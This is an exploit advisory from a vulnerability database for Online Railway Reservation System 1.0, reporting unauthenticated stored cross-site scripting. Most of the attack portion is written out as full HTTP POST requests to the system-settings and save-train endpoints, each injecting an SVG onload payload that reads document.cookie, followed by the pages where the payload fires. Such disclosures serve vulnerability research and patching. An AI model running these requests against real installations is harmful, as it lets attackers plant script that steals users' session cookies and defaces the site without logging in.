Online Railway Reservation System 1.0 Cross Site Scripting

2022.01.10
Credit: Zachary Asher
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#Exploit Title: Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated) #Date: 07/01/2022 #Exploit Author: Zachary Asher #Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip #Version: 1.0 #Tested on: Online Railway Reservation System 1.0 1) ===================================================================================================================================== To Store XSS (about_us) ===================================================================================================================================== POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447 Content-Length: 159 -----------------------------41914587873111789572282654447 Content-Disposition: form-data; name="content[about_us]" <svg/onload=alert(document.cookie)> ===================================================================================================================================== To Trigger Stored XSS (about_us) ===================================================================================================================================== Browse to http://<ip>/orrs/?page=about 2) ===================================================================================================================================== To Store XSS (train code) ===================================================================================================================================== POST /orrs/classes/Master.php?f=save_train HTTP/1.1 Host: localhost Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------271324269624375374252271437649 Content-Length: 254 -----------------------------271324269624375374252271437649 Content-Disposition: form-data; name="id" 1 -----------------------------271324269624375374252271437649 Content-Disposition: form-data; name="code" <svg/onload=alert(document.cookie)> ===================================================================================================================================== To Trigger XSS (train code) ===================================================================================================================================== Browse to http://localhost/orrs/?page=schedules


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top